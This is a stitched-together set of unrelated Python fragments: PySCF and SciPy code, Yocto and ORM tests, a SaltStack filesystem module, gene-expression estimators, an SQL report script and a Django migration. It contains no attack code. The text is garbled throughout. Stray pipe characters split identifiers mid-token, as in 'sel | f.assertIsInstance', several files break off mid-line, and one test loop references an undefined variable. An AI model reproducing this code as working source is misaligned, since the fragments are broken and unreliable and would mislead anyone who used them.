binRepo = platConfig.getBinaryRepository()
expectedBinaryRepoOutput = "{ 'protocol' : 'sftp', 'location' : 'jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk'}"
self.assertEquals(expectedBinaryRepoOutput, config.BinaryRepositoryEncoder.encode(binRepo))
self.assertEquals(expectedBinaryRepoOutput, json.dumps(binRepo, cls=config.BinaryRepositoryEncoder))
expectedPlatConfigOutput = "{ 'processName' : 'air.com.jingit.mobile', 'firstBinaryDate' : '2009-01-01', 'binaryRepository' : " + expectedBinaryRepoOutput + "}"
self.assertEquals(expectedPlatConfigOutput, config.PlatformConfigurationEncoder.encode(platConfig))
self.assertEquals(expectedPlatConfigOutput, json.dumps(platConfig, cls=config.PlatformConfigurationEncoder))
expectedAppConfigOutput = "{ 'Jingit': { 'platformConfigurations' : { " + expectedPlatCon | figOutput + "}}}"
self.assertEquals(expectedAppConfigOutput, config.ApplicationConfigEncoder.encode(app))
self.assertEquals(expectedAppConfigOutput, json.dumps(app, cls=config.ApplicationConfigEncoder))
expectedConfigOutput = "{ '__type__' : 'transgression-conf | iguration', 'applications' : " + expectedAppConfigOutput + "}}"
self.assertEquals(expectedConfigOutput, config.ConfigEncoder.encode(configObj))
self.assertEquals(expectedConfigOutput, json.dumps(configObj, cls=config.ConfigEncoder, indent=2))
if __name__ == '__main__':
unittest.main()
|
from pyscf.pbc.gto import Cell
from pyscf.pbc.scf import RHF
from pyscf.pbc.tdscf import TDHF
from pyscf.pbc.tdscf.rhf_slow import PhysERI, PhysERI4, PhysERI8, TDRHF
from pyscf.tdscf.common_slow import eig
from test_common import retrieve_m, retrieve_m_hf, assert_vectors_close
import unittest
from numpy import testing
class DiamondTestGamma(unittest.TestCase):
"""Compare this (rhf_slow) vs reference (pyscf)."""
@classmethod
def setUpClass(cls):
cls.cell = cell = Cell()
# Lift some degeneracies
cell.atom = '''
C 0.000000000000 0.000000000000 0.000000000000
C 1.67 1.68 1.69
'''
cell.basis = {'C': [[0, (0.8, 1.0)],
[1, (1.0, 1.0)]]}
# cell.basis = 'gth-dzvp'
cell.pseudo = 'gth-pade'
cell.a = '''
0.000000000, 3.370137329, 3.370137329
3.370137329, 0.000000000, 3.370137329
3.370137329, 3.370137329, 0.000000000'''
cell.unit = 'B'
cell.verbose = 5
cell.build()
cls.model_rhf = model_rhf = RHF(cell)
model_rhf.kernel()
cls.td_model_rhf = td_model_rhf = TDHF(model_rhf)
td_model_rhf.nroots = 5
td_model_rhf.kernel()
cls.ref_m_rhf = retrieve_m(td_model_rhf)
@classmethod
def tearDownClass(cls):
# These are here to remove temporary files
del cls.td_model_rhf
del cls.model_rhf
del cls.cell
def test_eri(self):
"""Tests all ERI implementations: with and without symmetries."""
for eri in (PhysERI, PhysERI4, PhysERI8):
try:
e = eri(self.model_rhf)
m = e.tdhf_full_form()
# Test matrix vs ref
testing.assert_allclose(m, retrieve_m_hf(e), atol=1e-14)
# Test matrix vs pyscf
testing.assert_allclose(self.ref_m_rhf, m, atol=1e-14)
vals, vecs = eig(m, nroots=self.td_model_rhf.nroots)
testing.assert_allclose(vals, self.td_model_rhf.e, atol=1e-5)
except Exception:
print("When testing {} the following exception occurred:".format(eri))
raise
def test_class(self):
"""Tests container behavior."""
model = TDRHF(self.model_rhf)
model.nroots = self.td_model_rhf.nroots
assert model.fast
e, xy = model.kernel()
model.fast = False
model.kernel()
# Slow vs fast
testing.assert_allclose(model.e, e)
assert_vectors_close(model.xy, xy)
# ... vs ref
testing.assert_allclose(model.e, self.td_model_rhf.e, atol=1e-12)
assert_vectors_close(model.xy, self.td_model_rhf.xy, atol=1e-12)
# Test real
testing.assert_allclose(model.e.imag, 0, atol=1e-8)
def test_cplx(self):
"""Tests whether complex conjugation is handled correctly."""
# Perform mf calculation
model_rhf = RHF(self.cell)
model_rhf.kernel()
# Add random phases
import numpy
numpy.random.seed(0)
p = numpy.exp(2.j * numpy.pi * numpy.random.rand(model_rhf.mo_coeff.shape[1]))
model_rhf.mo_coeff = model_rhf.mo_coeff * p[numpy.newaxis, :]
m_ref = PhysERI(model_rhf).tdhf_full_form()
td_model_rhf = TDRHF(model_rhf)
assert not td_model_rhf.fast
td_model_rhf.kernel()
with self.assertRaises(ValueError):
td_model_rhf.fast = True
td_model_rhf.kernel()
sel | f.assertIsInstance(td_model_rhf.eri, PhysERI4)
m = td_model_rhf.eri.tdhf_full_form()
| testing.assert_allclose(m, m_ref, atol=1e-14)
|
dtype = np.dtype(dtype)
if align is None:
align = dtype.alignment
if not hasattr(shape, '__len__'):
shape = (shape,)
size = functools.reduce(operator.mul, shape) * dtype.itemsize
buf = np.empty(size + align + 1, np.uint8)
offset = buf.__array_interface__['data'][0] % align
if offset != 0:
offset = align - offset
# Note: slices producing 0-size arrays do not necessarily change
# data pointer --- so we use and allocate size+1
buf = buf[offset:offset+size+1][:-1]
data = np.ndarray(shape, dtype, buf, order=order)
data.fill(0)
return data
def _prune_array(array):
"""Return an array equivalent to the input array. If the input
array is a view of a much larger array, copy its contents to a
newly allocated array. Otherwise, return the input unchanged.
"""
if array.base is not None and array.size < array.base.size // 2:
return array.copy()
return array
def prod(iterable):
"""
Product of a sequence of numbers.
Faster than np.prod for short lists like array shapes, and does
not overflow if using Python integers.
"""
product = 1
for x in iterable:
product *= x
return product
def float_factorial(n: int) -> float:
"""Compute the factorial and return as a float
Returns infinity when result is too large for a double
"""
return float(math.factorial(n)) if n < 171 else np.inf
class DeprecatedImport(object):
"""
Deprecated import with redirection and warning.
Examples
--------
Suppose you previously had in some module::
from foo import spam
If this has to be deprecated, do::
spam = DeprecatedImport("foo.spam", "baz")
to redirect users to use "baz" module instead.
"""
def __init__(self, old_module_name, new_module_name):
self._old_name = old_module_name
self._new_name = new_module_name
__import__(self._new_name)
self._mod = sys.modules[self._new_name]
def __dir__(self):
return dir(self._mod)
def __getattr__(self, name):
warnings.warn("Module %s is deprecated, use %s instead"
% (self._old_name, self._new_name),
DeprecationWarning)
return getattr(self._mod, name)
# copy-pasted from scikit-learn utils/validation.py
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None (or np.random), return the RandomState singleton used
by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
If seed is a new-style np.random.Generator, return it.
Otherwise, raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
try:
# Generator is only available in numpy >= 1.17
if isinstance(seed, np.random.Generator):
return seed
except AttributeError:
pass
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed)
def _asarray_validated(a, check_finite=True,
sparse_ok=False, objects_ok=False, mask_ok=False,
as_inexact=False):
"""
Helper function for SciPy argument validation.
Many SciPy linear algebra functions do support arbitrary array-like
input arguments. Examples of commonly unsupported inputs include
matrices containing inf/nan, sparse matrix representations, and
matrices with complicated elements.
Parameters
----------
a : array_like
The array-like input.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Default: True
sparse_ok : bool, optional
True if scipy sparse matrices are allowed.
objects_ok : bool, optional
True if arrays with dype('O') are allowed.
mask_ok : bool, optional
True if masked arrays are allowed.
as_inexact : bool, optional
True to convert the input array to a np.inexact dtype.
Returns
-------
ret : ndarray
The converted validated array.
"""
if not sparse_ok:
import scipy.sparse
if scipy.sparse.issparse(a):
msg = ('Sparse matrices are not supported by this function. '
'Perhaps one of the scipy.sparse.linalg functions '
'would work instead.')
raise ValueError(msg)
if not mask_ok:
if np.ma.isMaskedArray(a):
raise ValueError('masked arrays are not supported')
toarray = np.asarray_chkfinite if check_finite else np.asarray
a = toarray(a)
if not objects_ok:
if a.dtype is np.dtype('O'):
raise ValueError('object arrays are not supported')
if as_inexact:
if not np.issubdtype(a.dtype, np.inexact):
a = toarray(a, dtype=np.float_)
return a
# Add a replacement for inspect.getfullargspec()/
# The version below is borrowed from Django,
# https://github.com/django/django/pull/4846.
# Note an inconsistency between inspect.getfullargspec(func) and
# inspect.signature(func). If `func` is a bound method, the latter does *not*
# list `self` as a first argument, while the former *does*.
# Hence, cook up a common ground replacement: `getfullargspec_no_self` which
# mimics `inspect.getfullargspec` but does not list `self`.
#
# This way, the caller code does not need to know whether it uses a legacy
# .getfullargspec or a bright and shiny .signature.
FullArgSpec = namedtuple('FullArgSpec',
['args', 'varargs', 'varkw', 'defaults',
'kwonlyargs', 'kwonlydefaults', 'annotations'])
def getfullargspec_no_self(func):
"""inspect.getfullargspec replacement using inspect.signature.
If func is a bound method, do not list the 'self' parameter.
Parameters
----------
func : callable
A callable to inspect
Returns
-------
fullargspec : FullArgSpec(args, varargs, varkw, defaults, kwonlyargs,
kwonlydefaults, annotations)
NOTE: if the first argument of `func` is self, it is *not*, I repeat
*not*, included in fullargspec.args.
This is | done for consistency between inspect.getargspec() under
Python 2.x, and inspect.signature() under Python 3.x.
"""
sig = inspect.signature(func)
args = [
p.name for p in sig.parameters.values()
if p.kind in [inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.POSITIONAL_ONLY]
]
varargs = [
p.name for p in sig.parameters.values()
if p.k | ind == inspect.Parameter.VAR_POSITIONAL
]
varargs = varargs[0] if varargs else None
varkw = [
p.name for p in sig.parameters.values()
if p.kind == inspect.Parameter.VAR_KEYWORD
]
varkw = varkw[0] if varkw else None
defaults = tuple(
p.default for p in sig.parameters.values()
if (p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD and
p.default is not p.empty)
) or None
kwonlyargs = [
p.name for p in sig.parameters.values()
if p.kind == inspect.Parameter.KEYWORD_ONLY
]
kwdefaults = {p.name: p.default for p in sig.parameters.values()
if p.kind == inspect.Parameter.KEYWORD_ONLY and
p.default is not p.empty}
annotations = {p.name: p.annotation for p in sig.parameters.values()
if p.annotation is not p.empty}
return FullArgSpec(args, varargs, varkw, defaults, kwonlyargs,
kwdefaults or None, annotations)
class MapWrapper(object):
"""
Parallelisation wrapper for wor |
import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs
class TestBlobParsing(unittest.TestCase):
def setUp(self):
import time
self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
dir=get_bb_var('TOPDIR'))
self.repo = Repo.init(self.repo_path)
self.test_file = "test"
self.var_map = {}
def tearDown(self):
import shutil
shutil.rmtree(self.repo_path)
def commit_vars(self, to_add={}, to_remove = [], msg="A commit message"):
if len(to_add) == 0 and len(to_remove) == 0:
return
for k in to_remove:
self.var_map.pop(x,None)
for k in to_add:
self.var_map[k] = to_add[k]
with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
for k in self.var_map:
repo_file.write("%s = %s\n" % (k, self.var_map[k]))
self.repo.git.add("--all")
self.repo.git.commit(message=msg)
def test_blob_to_dict(self):
"""
Test convertion of git blobs to dictionary
"""
valuesmap = { "foo" : "1", "bar" : "2" }
self.commit_vars(to_add = valuesmap)
blob = self.repo.head.commit.tree.blobs[0]
self.assertEqual(valuesmap, blob_to_dict(blob),
"commit was not translated correctly to dictionary")
def test_compare_dict_blobs(self):
"""
Test comparisson of dictionaries extracted from git blobs
"""
changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}
self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
blob1 = self.repo.heads.master.commit.tree.blo | bs[0]
self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
| blob1, blob2, False, False)
var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
self.assertEqual(changesmap, var_changes, "Changes not reported correctly")
def test_compare_dict_blobs_default(self):
"""
Test default values for comparisson of git blob dictionaries
"""
defaultmap = { x : ("default", "1") for x in ["PKG", "PKGE", "PKGV", "PKGR"]}
self.commit_vars(to_add = { "foo" : "1" })
blob1 = self.repo.heads.master.commit.tree.blobs[0]
self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
blob1, blob2, False, False)
var_changes = {}
for x in change_records:
oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
var_changes[x.fieldname] = (oldvalue, x.newvalue)
self.assertEqual(defaultmap, var_changes, "Defaults not set properly")
|
import json
from zoom.common.types import UpdateType
class TimeEstimateMessage(object):
def __init__(self):
self._message_type = UpdateType.TIMING_UPDATE
self._contents = dict()
@property
def message_type(self):
return self._message_type
@property
def contents(self):
return self._contents
def update(self, item | ):
"""
:type item: dict
"""
self._contents.update(item)
def combine(self, message):
"""
:type message: TimeEstimateMessage
"""
self._contents.update(message.contents)
def clear(self):
self._contents.clear()
def to_json(self):
_dict = {}
_dict.update({
"update_type": s | elf._message_type,
})
_dict.update(self.contents)
return json.dumps(_dict)
|
from __future__ import print_function
from tree import create_tree
def get_height(root):
if root is None:
return 0
return max(get_height(root.left), get_height(root.right)) + 1
def is_balanced(root):
"""O(n^2)"""
if root is None:
return True
lb = is_balanced(root.left)
rb = is_balanced(root.right)
tb = abs(get_height(root.left) - get_height(root.right)) <= 1
return lb and rb and tb
def get_height2(root):
"""Get height and check whether balanced"""
if root is None:
return 0
lh = get_height2(root.left)
rh = get_height2(root.right)
if lh != -1 and rh != -1:
if abs(lh - rh) <= 1:
retur | n max(lh, rh) + 1
return -1
def is_balanced2(root):
return get_height2(root) != -1
def _test():
pass
def _print():
a1 = [1, None, 2, 3]
t1 = create_tree(a1 | )
a2 = [1, 2, 3]
t2 = create_tree(a2)
print(is_balanced(t1))
print(is_balanced(t2))
if __name__ == '__main__':
_test()
_print()
|
"""
This module implements fast estimators for the time-profiles of
growth rate, promoter activity, and protein concentrations.
These estimators rely on a simple model in which gene expression
is modeled as a one-step process. This enables to compute the
observation matrix directly using an ad-hoc formula.
As a consequence these algorithms are faster and require less
parameters than their counterparts in module ``estimators``
Simple approximations are made to compute the observation matrix,
these are valid as long as the vector of estimation times (ttu) of
the different estimated input (growth rate, promoter actitivity,
protein concentration) has a fine time resolution.
See also:
----------
estimators : collection of functions for the inference
"""
from ..curves import Curve
from .methods import DEFAULT_ALPHAS, infer_control
def ilp_growth_rate(curve_volume, ttu, alphas=None, eps_L=.0001):
"""
Returns
--------
mu, v_smoothed, model
As described below.
mu
Vector of inferred mu.
v_smoothed
The predicted value of the observed volume at the same time
points as the data. v_smoothed will appear smoothed compared to
the measured volume.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value of
the parameter alpha used etc.
"""
if isinstance(curve_volume, list):
results = [ilp_growth_rate(v, ttu,
alphas=alphas, eps_L=eps_L)
for v in curve_volume]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
ttv = curve_volume.x
dttu = 1.0*(ttu[1]-ttu[0])
H_ic = np.ones((len(ttv),1))
# dT is a Ny x Nu matrix with
# dT[i,j] = ttv[i] - ttu[j]
dT = np.array([ttv]).T - ttu
H_u = ( np.maximum(0, np.minimum(dttu, dT))
* curve_volume(ttu+ dttu/2))
H = np.hstack([H_ic, H_u])
growth_rate, v_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_volume.y, Nic= 1,
alphas= alphas, eps_L = eps_L)
return ( Curve(ttu, growth_rate),
Curve(ttv, v_smooth),
ic, alpha, ascores )
def ilp_synthe | sis_rate(curve_fluo, curve_volume, ttu, degr,
alphas=None, eps_L=.0001):
"""
dF/dt = s(t)V(t) - degr*F
Parameters
-----------
curve_fluo
A curve instance representing the (noisy) measured
fluorescence
| curve_volume
A curve instance representing the (noisy) measured
volume
ttu
Times at which the control is
Returns
--------
synth_rate, fluo_smoothed, ic, alpha, ascores
As described below.
synth_rate
Vector. Inferred control.
fluo_smoothed
The predicted value of the observed data at the same time
points as the data. y_smoothed will appear smoothed compared
to y.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value
of the parameter alpha used etc.
"""
if isinstance(curve_fluo, list):
results = [ilp_synthesis_rate(f, v, ttu, degr,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
tt_fluo= curve_fluo.x
H_ic = np.exp(-degr*tt_fluo).reshape((len(tt_fluo),1))
model = lambda Y,t: 1 - degr*Y
dtau = ttu[1]-ttu[0]
m = odeint(model,0,[0,dtau]).flatten()[1]
TT = (ttu-np.array([tt_fluo]).T)
H_u = (m*np.exp(degr*TT)*(TT<0)) * curve_volume(ttu + dtau/2)
H = np.hstack([H_ic, H_u])
activity, fluo_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_fluo.y, Nic= 1, alphas= alphas,
eps_L = eps_L)
return ( Curve(ttu, activity),
Curve(tt_fluo, fluo_smooth),
ic, alpha, ascores )
def ilp_concentration(curve_fluo, curve_volume, ttu, dR, dP,
alphas=None, eps_L=0.0001):
""" Retrieves the concentration of a protein P, given
the fluorescence of reporter R.
Parameters
-----------
curve_fluo
A curve instance representing the measured fluorescence
(proportional to the quantities of reporter)
curve_volume
Volume of the population.
dR
Degradation rate of the reporter
dP
Degradation rate of the proteins.
alphas
Smoothing parameters to be tested.
eps_L
Negligible factor for the derivation matrix.
"""
if isinstance(curve_fluo, list):
results = [ilp_concentration(f, v, ttu, dR, dP,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
tt = curve_fluo.x
deltatau = ttu[1]-ttu[0]
dT = np.array([tt]).T-ttu
dTlz = dT >= 0 # ti-tj > 0
dTlzsdtau = dTlz*(dT < deltatau) # 0 < ti-tj < delta_tau
A = np.exp(dR*np.minimum(deltatau, dT)) - 1
B = dTlz*np.exp(dT*(-dR))*(dP-dR)/dR
Hu = (dTlzsdtau + A*B)*curve_volume(ttu+deltatau/2)
Hic = np.array([np.exp(-dR*tt)]).reshape((len(tt),1))
H = np.hstack([Hic, Hu])
p_est, f_est, ic, a, ascores = infer_control(
H, curve_fluo.y, 1, alphas=alphas, eps_L=eps_L)
return (Curve(ttu, p_est),
Curve(tt, f_est),
ic, a, ascores ) |
orm.is_windows():
return (
False,
"The extfs execution module cannot be loaded: only available on "
"non-Windows systems.",
)
return True
def mkfs(device, fs_type, **kwargs):
"""
Create a file system on the specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.mkfs /dev/sda1 fs_type=ext4 opts='acl,noexec'
Valid options are:
* **block_size**: 1024, 2048 or 4096
* **check**: check for bad blocks
* **direct**: use direct IO
* **ext_opts**: extended file system options (comma-separated)
* **fragment_size**: size of fragments
* **force**: setting force to True will cause mke2fs to specify the -F
option twice (it is already set once); this is truly dangerous
* **blocks_per_group**: number of blocks in a block group
* **number_of_groups**: ext4 option for a virtual block group
* **bytes_per_inode**: set the bytes/inode ratio
* **inode_size**: size of the inode
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **blocks_file**: read bad blocks from file
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **test**: set to True to not actually create the file system (mke2fs -n)
* **number_of_inodes**: override default number of inodes
* **creator_os**: override "creator operating system" field
* **opts**: mount options (comma separated)
* **revision**: set the filesystem revision (default 1)
* **super**: write superblock and group descriptors only
* **fs_type**: set the filesystem type (REQUIRED)
* **usage_type**: how the filesystem is going to be used
* **uuid**: set the UUID for the file system
See the ``mke2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"block_size": "b",
"check": "c",
"direct": "D",
"ext_opts": "E",
"fragment_size": "f",
"force": "F",
"blocks_per_group": "g",
"number_of_groups": "G",
"bytes_per_inode": "i",
"inode_size": "I",
"journal": "j",
"journal_opts": "J",
"blocks_file": "l",
"label": "L",
"reserved": "m",
"last_dir": "M",
"test": "n",
"number_of_inodes": "N",
"creator_os": "o",
"opts": "O",
"revision": "r",
"super": "S",
"usage_type": "T",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "mke2fs -F -t {} {}{}".format(fs_type, opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
ret = []
for line in out:
if not line:
continue
elif line.startswith("mke2fs"):
continue
elif line.startswith("Discarding device blocks"):
continue
elif line.startswith("Allocating group tables"):
continue
elif line.startswith("Writing inode tables"):
continue
elif line.startswith("Creating journal"):
continue
elif line.startswith("Writing superblocks"):
continue
ret.append(line)
return ret
def tune(device, **kwargs):
"""
Set attributes for the specified device (using tune2fs)
CLI Example:
.. code-block:: bash
salt '*' extfs.tune /dev/sda1 force=True label=wildstallyns opts='acl,noexec'
Valid options are:
* **max**: max mount count
* **count**: mount count
* **error**: error behavior
* **extended_opts**: extended options (comma separated)
* **force**: force, even if there are errors (set to True)
* **group**: group name or gid that can use the reserved blocks
* **interval**: interval between checks
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **opts**: mount options (comma separated)
* **feature**: set or clear a feature (comma separated)
* **mmp_check**: mmp check interval
* **reserved**: reserved blocks count
* **quota_opts**: quota options (com | ma | separated)
* **time**: time last checked
* **user**: user or uid who can use the reserved blocks
* **uuid**: set the UUID for the file system
See the ``mke2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"max": "c",
"count": "C",
"error": "e",
"extended_opts": "E",
"force": "f",
"group": "g",
"interval": "i",
"journal": "j",
"journal_opts": "J",
"label": "L",
"last_dir": "M",
"opts": "o",
"feature": "O",
"mmp_check": "p",
"reserved": "r",
"quota_opts": "Q",
"time": "T",
"user": "u",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "tune2fs {}{}".format(opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
return out
def attributes(device, args=None):
"""
Return attributes from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.attributes /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["attributes"]
def blocks(device, args=None):
"""
Return block and inode info from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.blocks /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["blocks"]
def dump(device, args=None):
"""
Return all contents of dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.dump /dev/sda1
"""
cmd = "dumpe2fs {}".format(device)
if args:
cmd = cmd + " -" + args
ret = {"attributes": {}, "blocks": {}}
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
mode = "opts"
group = None
for line in out:
if not line:
continue
if line.startswith("dumpe2fs"):
continue
if mode == "opts":
line = line.replace("\t", " ")
comps = line.split(": ")
if line.startswith("Filesystem features"):
ret["attributes"][comps[0]] = comps[1].split()
elif line.startswith("Group") and not line.startswith(
"Group descriptor size"
):
mode = "blocks"
else:
if len(comps) < 2:
continue
ret["attributes"][comps[0]] = comps[1].strip()
if mode == "blocks":
if line.startswith("Group"):
line = line.replace(":", "")
line = line.replace("(", "")
line = line.replace(")", "")
line = line.replace("[", "")
line = line.replace("]", "")
comps = line.split()
blkgrp = comps[1]
group = "Group {}".format(blkgrp)
ret["blocks"][group] = {}
ret["blocks"][group]["group"] = blkgrp
ret["blocks"][group]["range"] = comps[3]
# TODO: comps[4:], which may look one one of the following:
# ITABLE_ZEROED
# INODE_UNINIT, ITABLE_ZEROED
# Does anyone know what |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.db_api import accident
def usa_query(hour):
return '''
SELECT count(*), (select count(*) from accident
join vehicle on(acc_id = accident.id)
where country = 'USA'
and vehicle.speed > accident.speed_limit
and vehicle.speed > -1
and accident.speed_limit > 0
and date_part('hour' | , timestamp) = {0}) as exceeded
from accident
where country = 'USA' and date_part('hour', timestamp) = {0};
'''.format(hour)
def get_value(age, dictionary):
if age not in dictionary:
return 0
return dict | ionary[age]
if __name__ == '__main__':
print('HOUR\tALL\tEXCEEDED')
for i in xrange(0, 24):
usa_count = accident.execute_query(usa_query(i))
print('{0}\t{1}\t{2}'.format(i, usa_count[0][0], usa_count[0][1]))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('member', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Broadcast',
| fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=20)),
('phone', models.CharField(max_length=15)),
],
),
migrations.CreateModel(
name='Log',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('message', models.CharField(max_length=200)),
('persons', models.ManyToManyField(to='member.Person')),
],
),
migrations.CreateModel(
name='Queue',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('sender', models.CharField(max_length=20)),
('message', models.CharField(max_length=200)),
('status', models.IntegerField(default=0, choices=[(0, b'Moderated'), (1, b'Pending'), (3, b'Spam')])),
('resolution', models.IntegerField(null=True, choices=[(0, b'Approved'), (1, b'Decline')])),
],
),
migrations.AddField(
model_name='log',
name='queue',
field=models.ForeignKey(blank=True, to='message.Queue', null=True),
),
]
| |
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.input_to_input,
'TestDBObject'
)
o1 = TestDBObject(id='1')
o1.save()
o2 = TestDBObject(id='2')
o2.save()
| o3 = TestDBObject(id='2')
o3.save()
o1.related.add(o2)
o2.r | elated.add(o3)
self.assertEqual(o1.related.as_set(), {o2})
self.assertEqual(o2.related.as_set(), {o3})
class TestResourceORM(BaseResourceTest):
def test_save(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
rr = resource.load(r.id)
self.assertEqual(r, rr.db_obj)
def test_add_input(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
self.assertEqual(len(r.inputs.as_set()), 1)
def test_delete_resource(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
class TestResourceInputORM(BaseResourceTest):
def test_backtrack_simple(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'y'}
)
sample3 = self.create_resource(
'sample3', sample_meta_dir, {'value': 'z'}
)
vi = sample2.resource_inputs()['value']
self.assertEqual(vi.backtrack_value_emitter(), vi)
# sample1 -> sample2
signals.connect(sample1, sample2)
self.assertEqual(vi.backtrack_value_emitter(),
sample1.resource_inputs()['value'])
# sample3 -> sample1 -> sample2
signals.connect(sample3, sample1)
self.assertEqual(vi.backtrack_value_emitter(),
sample3.resource_inputs()['value'])
# sample2 disconnected
signals.disconnect(sample1, sample2)
self.assertEqual(vi.backtrack_value_emitter(), vi)
def test_backtrack_list(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample_list_meta_dir = self.make_resource_meta("""
id: sample_list
handler: ansible
version: 1.0.0
input:
values:
schema: [str!]
value:
""")
sample_list = self.create_resource(
'sample_list', sample_list_meta_dir
)
vi = sample_list.resource_inputs()['values']
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'y'}
)
sample3 = self.create_resource(
'sample3', sample_meta_dir, {'value': 'z'}
)
self.assertEqual(vi.backtrack_value_emitter(), vi)
# [sample1] -> sample_list
signals.connect(sample1, sample_list, {'value': 'values'})
self.assertEqual(vi.backtrack_value_emitter(),
[sample1.resource_inputs()['value']])
# [sample3, sample1] -> sample_list
signals.connect(sample3, sample_list, {'value': 'values'})
self.assertSetEqual(set(vi.backtrack_value_emitter()),
set([sample1.resource_inputs()['value'],
sample3.resource_inputs()['value']]))
# sample2 disconnected
signals.disconnect(sample1, sample_list)
self.assertEqual(vi.backtrack_value_emitter(),
[sample3.resource_inputs()['value']])
def test_backtrack_dict(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample_dict_meta_dir = self.make_resource_meta("""
id: sample_dict
handler: ansible
version: 1.0.0
input:
value:
schema: {a: str!}
value:
""")
sample_dict = self.create_resource(
'sample_dict', sample_dict_meta_dir
)
vi = sample_dict.resource_inputs()['value']
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'z'}
)
self.assertEqual(vi.backtrack_value_emitter(), vi)
# {a: sample1} -> sample_dict
signals.connect(sample1, sample_dict, {'value': 'value:a'})
self.assertDictEqual(vi.backtrack_value_emitter(),
